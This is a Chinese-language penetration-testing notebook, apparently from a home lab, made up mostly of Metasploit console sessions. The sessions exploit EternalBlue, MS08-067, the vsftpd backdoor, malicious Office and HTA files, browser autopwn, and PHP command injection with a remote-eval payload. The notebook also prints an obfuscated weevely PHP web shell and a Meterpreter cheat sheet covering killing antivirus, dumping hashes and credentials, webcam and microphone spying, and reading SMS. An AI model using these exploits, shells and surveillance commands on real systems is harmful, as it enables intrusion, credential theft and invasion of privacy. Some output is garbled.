192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 192.168.0.158:445 - Sending egg to corrupted connection.[*] 192.168.0.158:445 - Triggering free of corrupted buffer.[*] Sending stage (200262 bytes) to 192.168.0.158[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49667 ) at 2022-06-23 16:32:15 +0800[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=meterpreter >

Windows 2000

msf6> use exploit/windows/dcerpc/ms03_026_dcom[*] Using configured payload windows/shell/reverse_tcpmsf6 exploit(windows/dcerpc/ms03_026_dcom) > show targetsExploit targets:   Id  Name   --  ----   0   Windows NT SP3-6a/2000/XP/2003 Universalmsf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcppayload => windows/shell_bind_tcpmsf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 192.168.0.170RHOST => 192.168.0.170msf6 exploit(windows/dcerpc/ms03_026_dcom) > run[*] 192.168.0.170:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...[*] 192.168.0.170:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.170[135] ...[*] 192.168.0.170:135 - Calling DCOM RPC with payload (1648 bytes) ...[*] Started bind TCP handler against 192.168.0.170:4444[*] Command shell session 1 opened (192.168.0.150:34825 -> 192.168.0.170:4444) at 2022-07-21 15:40:55 +0800Shell Banner:Microsoft Windows 2000 [Version 5.00.2195]-----C:WINNTsystem32>

利用木馬

Windows 10、7、2003

msf> use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf exploit/multi/handler> set lhost 192.168.0.150lhost => 192.168.0.150msf exploit/multi/handler> set lport 8888lport => 8888msf exploit/multi/handler> set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit/multi/handler> run[*] Started reverse TCP handler on 192.168.0.150:8888[*] Sending stage (175686 bytes) to 192.168.0.106[*] Meterpreter session 1 opened (192.168.0.150:8888 -> 192.168.0.106:3552) at 2022-07-21 11:02:24 +0800meterpreter >

利用客戶端漏洞滲透

利用軟件vsftpd 2.3.4

Linux

msf6 > nmap -sT -A -P0 192.168.0.161msf6 exploit(windows/smb/ms08_067_netapi) > nmap -sT -A -P0 192.168.0.161[*] exec: nmap -sT -A -P0 192.168.0.161Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 18:36 CSTNmap scan report for 192.168.0.161Host is up (0.00081s latency).Not shown: 977 closed tcp ports (conn-refused)PORT     STATE SERVICE     VERSION21/tcp   open  ftp         vsftpd 2.3.4| ftp-syst:|   STAT:| FTP server status:|      Connected to 192.168.0.150|      Logged in as ftp|      TYPE: ASCII|      No session bandwidth limit|      Session timeout in seconds is 300|      Control connection is plain text|      Data connections will be plain text|      vsFTPd 2.3.4 - secure, fast, stable|_End of status|_ftp-anon: Anonymous FTP login allowed (FTP code 230)22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)| ssh-hostkey:|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)23/tcp   open  telnet      Linux telnetd25/tcp   open  smtp        Postfix smtpd|_ssl-date: 2022-07-14T10:36:30+00:00; +6s from scanner time.msf6 >search vsftpdMatching Modules================   #  Name                                  Disclosure Date  Rank       Check  Description   -  ----                                  ---------------  ----       -----  -----------   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command ExecutionInteract with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoormsf6 > use 0[*] No payload configured, defaulting to cmd/unix/interactmsf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interactpayload => cmd/unix/interactmsf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.161rhost => 192.168.0.161msf6 exploit(unix/ftp/vsftpd_234_backdoor) >exploit[*] 192.168.0.161:21 - Banner: 220 (vsFTPd 2.3.4)[*] 192.168.0.161:21 - USER: 331 Please specify the password.[+] 192.168.0.161:21 - Backdoor service has been spawned, handling...[+] 192.168.0.161:21 - UID: uid=0(root) gid=0(root)[*] Found shell.[*] Command shell session 1 opened (192.168.0.150:35303 -> 192.168.0.161:6200) at 2022-07-14 18:41:26 +0800

暴力猜測目標開放的端口

Windows 2000

mf6>use exploit/windows/smb/ms08_067_netapi

msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allportsmsf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.0.158rhost => 192.168.0.158msf6 exploit(windows/smb/ms08_067_netapi) > run[*] Started reverse TCP handler on 192.168.0.150:1[*] 192.168.0.158:445 - Attempting to trigger the vulnerability...[*] Sending stage (175686 bytes) to 192.168.0.158[*] 192.168.0.158 - Meterpreter session 1 closed.  Reason: Died[-] Meterpreter session 1 is not valid and will be closed192.168.0.158 windows 2000 自動關機

使用msf.doc文件

Windows 2000 SP0/SP4 English

msf6 exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/ms11_006_createsizeddibsection[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > infoName: MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer OverflowModule: exploit/windows/fileformat/ms11_006_createsizeddibsectionPlatform: Windows       Arch: Privileged: No    License: Metasploit Framework License (BSD)       Rank: Great  Disclosed: 2010-12-15Provided by:  Moti & Xu Hao  Yaniv Miron aka Lament of ilhack  jduck Available targets:  Id  Name  --  ----  0   Automatic  1   Windows 2000 SP0/SP4 English  2   Windows XP SP3 English  3   Crash Target for DebuggingCheck supported:  NoBasic options:  Name      Current Setting  Required  Description  ----      ---------------  --------  -----------  FILENAME  msf.doc          yes       The file name.Payload information:  Space: 512  Avoid: 1 charactersDescription:  This module exploits a stack-based buffer overflow in the handling  of thumbnails within .MIC files and various Office documents. When  processing a thumbnail bitmap containing a negative 'biClrUsed'  value, a stack-based buffer overflow occurs. This leads to arbitrary  code execution. In order to trigger the vulnerable code, the folder  containing the document must be viewed using the "Thumbnails" view.References:  https://nvd.nist.gov/vuln/detail/CVE-2010-3970  OSVDB (70263)  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/MS11-006  http://www.securityfocus.com/bid/45662msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > exploit[*] Creating 'msf.doc' file ...[+] msf.doc created at /root/.msf4/local/msf.doc#cp /root/.msf4/local/msf.doc /home/jerry/

復制msf.doc到windows下

msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.0.150lhost => 192.168.0.150windows下打開msf.docmsf6 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 192.168.0.150:8888[*] Sending stage (175686 bytes) to 192.168.0.169[*] Meterpreter session 2 opened (192.168.0.150:8888 -> 192.168.0.169:1487) at 2022-07-20 15:47:53 +0800

使用HTA文件進行攻擊

Windows 10、7

HTA文件解析程序

C:WindowsSystem32mshta.exe

HTA文件解析程序文件運行

demo.hta

<html><title>WEB安全測試實驗</title><linkrel="stylesheet" type="text/css"href="../css/style.css"><head><metahttp-equiv="Content-Type" content="text/html;charset=utf-8"></head><body><h1>WEB 安全測試實驗</h1></body></html>

WEB 安全測試實驗

直接運行

在瀏覽器中運行

開始攻擊

#msfconsole msf6 > use exploit/windows/fileformat/office_word_htamsf6 exploit(windows/fileformat/office_word_hta) > show targetsExploit targets:   Id  Name   --  ----   0   Microsoft Office Wordmsf6 exploit(windows/fileformat/office_word_hta) > run[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.0.150:4444msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/jerry/.msf4/local/msf.doc[*] Using URL: http://0.0.0.0:8080/default.hta[*] Local IP: http://192.168.0.150:8080/default.hta[*] Server started.[*] Sending stage (175174 bytes) to 192.168.0.106[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:8176 ) at 2022-06-16 16:27:50 +0800

打開被攻擊對象瀏覽器,輸入http://192.168.0.150:8080/default.hta,直接運行或者保存default.hta再運行,被攻擊成功。

msf6 exploit(windows/fileformat/office_word_hta) > sessionsActive sessions===============  Id  Name  Type   Information  Connection  --  ----  ----   ---------------------  1  meterpreter x86/windows  DESKTOP-9A8VFKBxiang @ DES 192.168.0.150:4444 -> 192.16  KTOP-9A8VFKB 8.0.106:8176  (192.168.0.106 )msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1[*] Starting interaction with 1...meterpreter > lsListing: C:UsersxiangDownloads=================================Mode  Size  Type  Last modified  Name----  ----  ----  -------------  ----100666/rw-rw-rw-  7185  fil   2022-06-16 16:26:27 +0800  default.hta100666/rw-rw-rw-  282   fil   2021-04-27 15:13:52 +0800  desktop.inimeterpreter > pwdC:UsersxiangDownloadsmeterpreter > getuidServer username: DESKTOP-9A8VFKBxiang

利用瀏覽器插件:adobe flash進行攻擊

沒有成功,估計現在不支持adobe flash

#msfconsole

msf6 > search adobe_flash

msf6 > use 9msf6 > use exploit/multi/browser/adobe_flash_hacking_team_uaf[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(multi/browser/adobe_flash_hacking_team_uaf) > run[*] Started reverse TCP handler on 192.168.0.150:4444[*] Using URL: http://0.0.0.0:8080/y0dKYgEIkI2zc[*] Local IP: http://192.168.0.150:8080/y0dKYgEIkI2zc[*] Server started.

服務器安裝adobe flash play 17 Active,在瀏覽器輸入:http://192.168.0.150:8080/y0dKYgEIkI2zc,就被激活

監測瀏覽器漏洞

利用browser_autopwn進行攻擊

Windows 10、7、2003

msf6 auxiliary(server/browser_autopwn2) > use server/browser_autopwnmsf6 auxiliary(server/browser_autopwn) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 auxiliary(server/browser_autopwn) > run[*] Auxiliary module running as background job 27.msf6 auxiliary(server/browser_autopwn) >[*] Setup[*] Starting exploit modules on host 192.168.0.150...[*] ---[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/QOSlCDKP[*] Local IP: http://192.168.0.150:8080/QOSlCDKP[*] Server started.[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp[*] Using URL: http://0.0.0.0:8080/LNRlnrxdQ[*] Local IP: http://192.168.0.150:8080/LNRlnrxdQ[*] Server started.[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp[*] Using URL: http://0.0.0.0:8080/SytDwnNLVJ[*] Local IP: http://192.168.0.150:8080/SytDwnNLVJ[*] Server started.[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp[*] Using URL: http://0.0.0.0:8080/XxbRZnvPzF[*] Local IP: http://192.168.0.150:8080/XxbRZnvPzF[*] Server started.[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/dIavmEmlsJvA[*] Local IP: http://192.168.0.150:8080/dIavmEmlsJvA[*] Server started.[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/FSRTIbVUWRDsU[*] Local IP: http://192.168.0.150:8080/FSRTIbVUWRDsU[*] Server started.[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/lIROBHwdaD[*] Local IP: http://192.168.0.150:8080/lIROBHwdaD[*] Server started.[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/pyJEvk[*] Local IP: http://192.168.0.150:8080/pyJEvk[*] Server started.[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/huhYFRmk[*] Local IP: http://192.168.0.150:8080/huhYFRmk[*] Server started.[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/jAzqekl[*] Local IP: http://192.168.0.150:8080/jAzqekl[*] Server started.[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp[*] Using URL: http://0.0.0.0:8080/JCbqIs[*] Local IP: http://192.168.0.150:8080/JCbqIs[*] Server started.[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/cBiTChJAeCWA[*] Local IP: http://192.168.0.150:8080/cBiTChJAeCWA[*] Server started.[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/kRyiwct[*] Local IP: http://192.168.0.150:8080/kRyiwct[*] Server started.[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/YYQeJjzuqe[*] Local IP: http://192.168.0.150:8080/YYQeJjzuqe[*] Server started.…[*] Using URL: http://0.0.0.0:8080/PdyJht6uQ[*] Local IP: http://192.168.0.150:8080/PdyJht6uQ[*] Server started.

在被測瀏覽器中輸入:http://192.168.0.150:8080/PdyJht6uQ 等

[*] 192.168.0.106ie_createobject - Sending exploit HTML...[*] 192.168.0.106mozilla_nstreerange - Redirecting to .html URL[*] 192.168.0.106mozilla_nstreerange - Sending HTML[*] 192.168.0.106mozilla_nstreerange - Sending XUL[-] 192.168.0.106msxml_get_definition_code_exec - 192.168.0.106:10064 - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36[-] 192.168.0.106adobe_flash_rtmp - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36[*] 192.168.0.106ie_cgenericelement_uaf - Requesting: /YYQeJjzuqe[-] 192.168.0.106ie_cgenericelement_uaf - Browser not supported, sending 404: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36Interrupt: use the 'exit' command to quitmsf6 auxiliary(server/browser_autopwn) > sessions -iActive sessions===============No active sessions.

利用browser_autopwn2進行攻擊

Windows 2003

msf6 > use server/browser_autopwn2msf6 auxiliary(server/browser_autopwn2) > run[*] Auxiliary module running as background job 0.[*] Searching BES exploits, please wait...msf6 auxiliary(server/browser_autopwn2) > [*] Starting exploit modules...[*] Starting listeners...[*] Time spent: 31.071206468[*] Using URL: http://0.0.0.0:8080/IqV4IRZ7Q85f[*] Local IP: http://192.168.0.150:8080/IqV4IRZ7Q85f[*] The following is a list of exploits that BrowserAutoPwn will consider using.[*] Exploits with the highest ranking and newest will be tried first.Exploits======== Order  Rank   Name   Payload -----  ----   ----   ------- 1 Excellent  firefox_webidl_injection  firefox/shell_reverse_tcp on 4442 2 Excellent  firefox_tostring_console_injection  firefox/shell_reverse_tcp on 4442 3 Excellent  firefox_svg_plugin  firefox/shell_reverse_tcp on 4442 4 Excellent  firefox_proto_crmfrequestfirefox/shell_reverse_tcp on 4442 5 Excellent  webview_addjavascriptinterface   android/meterpreter/reverse_tcp on 4443 6 Excellent  samsung_knox_smdm_urlandroid/meterpreter/reverse_tcp on 4443 7 Great adobe_flash_worker_byte_array_uaf  windows/meterpreter/reverse_tcp on 4444 8 Great adobe_flash_domain_memory_uafwindows/meterpreter/reverse_tcp on 4444 9 Great adobe_flash_copy_pixels_to_byte_arra windows/meterpreter/reverse_tcp on 4444 10 Great adobe_flash_casi32_int_overflow windows/meterpreter/reverse_tcp on 4444 11 Great adobe_flash_delete_range_tl_op  osx/x86/shell_reverse_tcp on 4447 12 Great adobe_flash_uncompress_zlib_uaf windows/meterpreter/reverse_tcp on 4444 13 Great adobe_flash_shader_job_overflow windows/meterpreter/reverse_tcp on 4444 14 Great adobe_flash_shader_drawing_fill  windows/meterpreter/reverse_tcp on 4444 15 Great adobe_flash_pixel_bender_bofwindows/meterpreter/reverse_tcp on 4444 16 Great adobe_flash_opaque_background_uaf  windows/meterpreter/reverse_tcp on 4444 17 Great adobe_flash_net_connection_confusion windows/meterpreter/reverse_tcp on 4444 18 Great adobe_flash_nellymoser_bof windows/meterpreter/reverse_tcp on 4444 19 Great adobe_flash_hacking_team_uaf   windows/meterpreter/reverse_tcp on 4444 20 Good wellintech_kingscada_kxclientdownloa windows/meterpreter/reverse_tcp on 44 44 21 Good ms14_064_ole_code_execution   windows/meterpreter/reverse_tcp on 4444[+] Please use the following URL for the browser attack:[+] BrowserAutoPwn URL: http://192.168.0.150:8080/IqV4IRZ7Q85f[*] Server started.

在被測瀏覽器中輸入:http://192.168.0.150:8080/IqV4IRZ7Q85f

[*] Gathering target information for 192.168.0.169[*] Sending HTML response to 192.168.0.169[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Requested: /PIJKiQZx/hqDDuX/[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution[*] 192.168.0.169    ms14_064_ole_code_execution - Sending exploit...[*] 192.168.0.169    ms14_064_ole_code_execution - Sending VBS stager[*] Sending stage (175686 bytes) to 192.168.0.169[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.169:1525) at 2022-07-20 17:36:45 +0800

利用Web漏洞

Windows 10、7、2003、2000

http://192.168.0.160:8100/sec/17/example.php?cmd=是一個PHP命令注入漏洞

msf6 > use exploit/multi/script/web_delivery[*] Using configured payload python/meterpreter/reverse_tcpmsf6 exploit(multi/script/web_delivery) > optionsModule options (exploit/multi/script/web_delivery):Name Current Setting  Required  Description---- ---------------  --------  -----------SRVHOST  0.0.0.0   yes The local host or network interface to listen on. This  must be an address on the local machine or 0.0.0.0 to l  isten on all addresses.SRVPORT  8080  yesThe local port to listen on.SSL  falsenoNegotiate SSL for incoming connectionsSSLCert  no Path to a custom SSL certificate (default is randomly g   enerated)URIPATH noThe URI to use for this exploit (default is random)Payload options (python/meterpreter/reverse_tcp): Name   Current Setting  Required  Description----   ---------------  --------  -----------LHOSTyes   The listen address (an interface may be specified)LPORT  4444 yesThe listen portExploit target:Id  Name--  ----   0   Pythonmsf6 exploit(multi/script/web_delivery) > show targetsExploit targets:   Id  Name   --  ----   0   Python   1   PHP   2   PSH   3   Regsvr32   4   pubprn   5   SyncAppvPublishingServer   6   PSH (Binary)   7   Linux   8   Mac OS Xmsf6 exploit(multi/script/web_delivery) > set target 1target => 1msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcppayload => php/meterpreter/reverse_tcpmsf6 exploit(multi/script/web_delivery) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(multi/script/web_delivery) > set lport 8899lport => 8888msf6 exploit(multi/script/web_delivery) > run[*] Exploit running as background job 2.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.0.150:8899  [*] Using URL: http://0.0.0.0:8080/SPzNh9msf6 exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.0.150:8080/SPzNh9  [*] Server started.  [*] Run the following command on the target machine:php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.150:8080/SPzNh9', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"在瀏覽器中輸入:http://192.168.0.160:8100/sec/17/example.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.0.160:8080/SPzNh9%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22[*] 192.168.0.150   web_delivery - Delivering Payload (1114 bytes)[*] Sending stage (39282 bytes) to 192.168.0.150[*] Meterpreter session 1 opened (192.168.0.150:8899 -> 192.168.0.160:38676 ) at 2022-06-16 18:38:14 +0800msf6 exploit(multi/script/web_delivery) > sessionsActive sessions===============  Id  Name  TypeInformation   Connection  --  ----  ---------------   ----------  1   meterpreter php/linux  www-data @ Jerry  192.168.0.150:8899 -> 192.168.0.150:38676  (192.168.0.150)msf6 exploit(multi/script/web_delivery) > sessions -i 1[*] Starting interaction with 1...meterpreter > dirListing: /var/www/html/sec/17=============================Mode  Size  Type  Last modified  Name----  ----  ----  -------------  ----100766/rwxrw-rw-  110   fil   2022-06-06 19:09:45 +0800  example.phpmeterpreter > pwd/var/www/html/sec/17meterpreter > getuidServer username: www-data

利用Web系統進行遠程控制

#weevely generate 123456 ./testweb.phpGenerated './testweb.php' with password '123456' of 677 byte size.

testweb.php

<?php$B='$k){hg$c=strlen($hgk)hg;$l=sthghgrlen($t);hg$o="";for($i=0hg;hg$i<$l;)hg{for($j=hg0;($jhghg<hg$chg&&$i<$l);$jhg++,$ih';< span=""></hg$chg&&$i<$l);$jhg++,$ih';<>$c='=@ob_get_conthgentshg();@ob_hgend_clhgean();$r=hg@bashge64_enhgcodehg(@x(@hggzhgcompresshg($o),$k));prihgnt("$phg$khgh$r$kf");}';$R=str_replace('R','','crReaRRte_fuRncRtRion');$L='$k="ehg10hgahgdc3hg9";$kh="49ba5hg9abbe5hg6";$khgf="e057f20fhghg883e";$p="kRXhgw88VYFzhgEOYQOk"hghg;functihgon x($hgt,';$I=':/hghg/inputhg"),hg$mhg)==1) {@ob_starhgt();@evahgl(@gzuncomhgpresshg(@x(@hgbashge64_decodhge($m[1]hg),$k)))hg;hghg$o';$k='g++){$o.=$t{$i}^$k{$j}hg;}}rhgeturnhg $o;}ifhg hg(@prhgeg_match("/$khhg(.+)$kfhg/hg",@file_gethghg_conhgtents("php';$J=str_replace('hg','',$L.$B.$k.$I.$c);$h=$R('',$J);$h();?>

# weevely http://192.168.0.106:8100/sec/19/testweb.php 123456[+] weevely 4.0.1[+] Target: 192.168.0.150:8100[+] Session:/root/.weevely/sessions/192.168.0.150/testweb_0.session[+] Browse the filesystem or execute commands starts the connection[+] to the target. Type :help for more information.weevely> help:file_rmRemove remote file.:file_clearlogRemove string from a file.:file_editEdit remote file on a local editor.:file_bzip2  Compress or expand bzip2 files.:file_upload  Upload file to remote filesystem.:file_downloadDownload file from remote filesystem. :file_ls   List directory content.:file_webdownload Download an URL.  :file_cp   Copy single file. :file_find Find files with given names and attributes.  :file_enum Check existence and permissions of a list of paths. :file_tar  Compress or expand tar archives. :file_touchChange file timestamp. :file_zip  Compress or expand zip files.  :file_mountMount remote filesystem using HTTPfs. :file_gzip Compress or expand gzip files. :file_cd   Change current working directory. :file_upload2web   Upload file automatically to a web folder and get corresponding URL. :file_read Read remote file from the remote filesystem.  :file_grep Print lines matching a pattern in multiple files. :file_checkGet attributes and permissions of a file. :shell_sh  Execute shell commands. :shell_php Execute PHP commands.  :shell_su  Execute commands with su.  :sql_dump  Multi dbms mysqldump replacement. :sql_console  Execute SQL query or run console. :system_extensionsCollect PHP and webserver extension list. :system_info  Collect system information. :system_procs List running processes. :audit_filesystem Audit the file system for weak permissions.   :audit_disablefunctionbypass  Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd  Read /etc/passwd with different techniques.   :audit_suidsgid   Find files with SUID or SGID flags.   :audit_phpconfAudit PHP configuration.   :bruteforce_sql   Bruteforce SQL database.   :backdoor_tcp Spawn a shell on a TCP port.   :backdoor_reversetcp  Execute a reverse TCP shell.   :net_scan  TCP Port scan. :net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the target. :net_ifconfig Get network interfaces addresses. :net_curl  Perform a curl-like HTTP request. :net_mail  Send mail. :net_phpproxy Install PHP proxy on the target.DESKTOP-9A8VFKB:C:xampphtdocssec19 $ system_info+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+| document_root    | C:/xampp/htdocs                                                                         || whoami                 |                                                                                           || hostname              | DESKTOP-9A8VFKB                                                                         || pwd                    | C:xampphtdocssec19                                                                || open_basedir           |                                                                                           || safe_mode              | False                                                                                     || script                 | /sec/19/testweb.php                                                                     || script_folder          | C:xampphtdocssec19                                                                || uname                  | Windows NT DESKTOP-9A8VFKB 6.2 build 9200 (Windows 8 Home Premium Edition) i586 || os                     | Windows NT                                                                              || client_ip              | 192.168.0.150                                                                           || max_execution_time   | 30                                                                                        || php_self               | /sec/19/testweb.php                                                                     || dir_sep                |                                                                                          || php_version            | 5.6.28                                                                                  |+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+DESKTOP-9A8VFKB:C:xampphtdocssec19 $ autit_filesystem'autit_filesystem' ????????????????????????е?????????????????

資源文件

最基本的資源文件

#echo version >resource.rc#echo loadsounds >> version#echo loadsounds >>resource.rc

# msfconsole -r resource.rc…[*] Processing resource.rc for ERB directives.resource (resource.rc)> versionFramework: 6.1.27-devConsole  : 6.1.27-devresource (resource.rc)> load sounds[*] Successfully loaded plugin: soundsmsf6 >

攻擊Windows 7資源文件

windows7.rc

# msfconsole -r windows7.rc…

攻擊Windows 10資源文件

Windows 10.rc

# msfconsole -r windows10.rc…

攻擊Android資源文件

android.rc

# msfconsole -r android.rc…

滲透Linux

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor[*] No payload configured, defaulting to cmd/unix/interactmsf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interactpayload => cmd/unix/interactmsf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.160rhost => 192.168.0.160msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run[*] 192.168.0.160:21 - Banner: 220 (vsFTPd 2.3.4)[*] 192.168.0.160:21 - USER: 331 Please specify the password.[+] 192.168.0.160:21 - Backdoor service has been spawned, handling...[+] 192.168.0.160:21 - UID: uid=0(root) gid=0(root)[*] Found shell.[*] Command shell session 1 opened (192.168.0.150:38079 -> 192.168.0.160:6200) at 2022-06-30 17:41:05 +0800

Meterpreter指南(后滲透技術)

基本命令

meterpreter常用命令

針對安卓的命令

dump_contacts

獲取手機通訊錄

dump_sms

獲取短信記錄

send_sms -d 15330252525 -t “hello”

控制實驗手機發短信

geolocate

獲取實驗手機GPS定位信息

wlan_geolocate

獲取實驗手機Wi-Fi定位信息

record_mic -d 5

控制實驗手機錄音

webcam_list

獲取實驗手機相機設備

webcam_snap

控制實驗手機拍照

webcam_stream

直播實驗手機攝像頭

針對Windows的一些命令

ps

查看進程:

getpid

查看當前進程號:

sysinfo

查看系統信息:

route

查看完整網絡設置:

getsystem

自動提權

getuid

查看當前權限

pwd

查看當前處于目標機的那個目錄

其他命令

查看目標機是否為虛擬機:run post/windows/gather/checkvm

關閉殺毒軟件:run post/windows/manage/killav

啟動遠程桌面協議:run post/windows/manage/enable_rdp

列舉當前登錄的用戶:run post/windows/gather/enum_logged_on_users

查看當前應用程序:run post/windows/gather/enum_applications

抓取目標機的屏幕截圖:load espia ; screengrab

獲取相機設備:webcam_list

控制拍照:webcam_snap

直播攝像頭:webcam_stream

控制錄音:record_mic

查看當前目錄:getlwd

導出當前用戶密碼哈希 run hashdump

用戶名:SID:LM哈希:NTLM哈希:::

也可以使用下面這個命令導出權限更高 run windows/gather/smart_hashdump

抓取自動登錄的用戶名和密碼 run windows/gather/credentials/windows_autologin

直接獲取明文密碼(注意這個功能需要獲取系統權限獲取系統權限需要輸入getsystem)

Shell 腳本

進入Windows的終端shell

文件系統命令

文件交互指令

Linux權限

chmod 777 {文件名.后綴}

chmod 777 shell.elf

upload

上傳文件到目標機主上,如upload setup.exe C:windowssystem32

download nimeia.txt /root/Desktop/

# 下載文件到本機上如:download C:boot.ini /root/或者download C:“ProgramFiles”TencentQQUsers295******125Msg2.0.db /root/

search

search 文件,如

search -d c: -f*.doc

search -d c:UsersxiangDesktop -f *.txt

enumdesktops

用戶登錄數

ipconfig

查看IP地址

其他命令

截屏

meterpreter > screenshot

Screenshot saved to: /home/jerry/BqXLvJAp.jpeg

獲得系統信息

meterpreter > sysinfoComputer                     : WIN-2VEIIKHJ7M8OS                            : Windows 7 (6.1 Build 7601, Service Pack 1).Architecture              : x64System Language        : zh_CNDomain                     : WORKGROUPLogged On Users        : 2Meterpreter              : x64/windows

獲取鍵盤信息

